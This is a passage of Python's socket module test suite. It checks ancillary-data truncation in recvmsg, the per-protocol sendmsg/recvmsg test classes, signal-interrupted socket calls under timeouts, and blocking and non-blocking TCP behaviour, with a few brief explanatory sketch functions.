(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
    @testSecondCmsgTruncInData.client_skip
    def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
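# A minimal standalone sketch (not part of the test suite) of the CMSG_LEN()
# and CMSG_SPACE() arithmetic that the truncation tests above rely on.  It
# assumes a POSIX platform where socket.CMSG_LEN/CMSG_SPACE are available:
# CMSG_LEN(n) is the exact size of one control message carrying n bytes of
# data, while CMSG_SPACE(n) also includes the padding required before a
# following message, so a buffer of CMSG_SPACE(n) bytes holds one complete
# item but not the header of a second one.
def _cmsg_size_sketch(n=4):
    import socket
    exact = socket.CMSG_LEN(n)       # header plus n data bytes
    padded = socket.CMSG_SPACE(n)    # exact size rounded up with padding
    return exact, padded             # padded >= exact always holds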
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITETestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "sendmsg")
class SendmsgUDPLITETest(SendmsgConnectionlessTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgUDPLITETest(RecvmsgTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoUDPLITETest(RecvmsgIntoTests, SendrecvmsgUDPLITETestBase):
pass
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class SendrecvmsgUDPLITE6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPLITE6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class SendmsgUDPLITE6Test(SendmsgConnectionlessTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgUDPLITE6Test(RecvmsgTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoUDPLITE6Test(RecvmsgIntoTests, SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgRFC3542AncillaryUDPLITE6Test(RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
class RecvmsgIntoRFC3542AncillaryUDPLITE6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDPLITE6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
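# A minimal standalone sketch (not part of the test suite) of the behaviour
# exercised by the test classes that follow: a SIGALRM handler that raises an
# exception interrupts a socket call that is blocking under a timeout, and
# the handler's exception propagates out of the call.  POSIX only; it assumes
# signal.setitimer() is available.
def _interrupted_recv_sketch():
    import socket, signal
    def handler(signum, frame):
        raise ZeroDivisionError      # the tests below use 1/0 for the same effect
    old_handler = signal.signal(signal.SIGALRM, handler)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.bind(("127.0.0.1", 0))
        sock.settimeout(5.0)         # longer than the alarm below
        signal.setitimer(signal.ITIMER_REAL, 0.05)
        try:
            sock.recv(1024)          # no data arrives; SIGALRM fires first
        except ZeroDivisionError:
            return True              # interrupted as expected
        return False
    finally:
        signal.setitimer(signal.ITIMER_REAL, 0)
        signal.signal(signal.SIGALRM, old_handler)
        sock.close()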
class InterruptedTimeoutBase(unittest.TestCase):
    # Base class for interrupted send/receive tests.  Installs a SIGALRM
    # handler that raises ZeroDivisionError and removes it on teardown,
    # along with any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = support.LOOPBACK_TIMEOUT
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) is interrupted by the SIGALRM
        # handler and propagates the ZeroDivisionError that the handler
        # raises.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, is interrupted by
        # the SIGALRM handler and propagates the ZeroDivisionError that the
        # handler raises.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
        # Pass an actual address here because Python's wrapper for
        # sendto() doesn't allow passing a zero-length one; POSIX
        # requires the address to be ignored anyway, since the socket
        # is connection-mode.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
            # When a Python socket has a non-zero timeout, it's switched
            # internally to a non-blocking mode. Later, sock.sendall(),
            # sock.recv(), and other socket operations use a select() call and
            # handle EWOULDBLOCK/EAGAIN on all socket operations. That's how
            # timeouts are enforced.  (A standalone sketch of this appears
            # right after this class.)
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
        # bpo-7995: when accept() is called on a listening socket that has a
        # timeout and the default timeout is None, the resulting socket must
        # be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
        # bpo-7995: when accept() is called on a listening socket that has a
        # timeout and a default timeout is set, the resulting socket must
        # inherit the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(False)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], support.LONG_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(False)
        # the client hasn't sent data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], support.LONG_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
        # the client has sent data: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
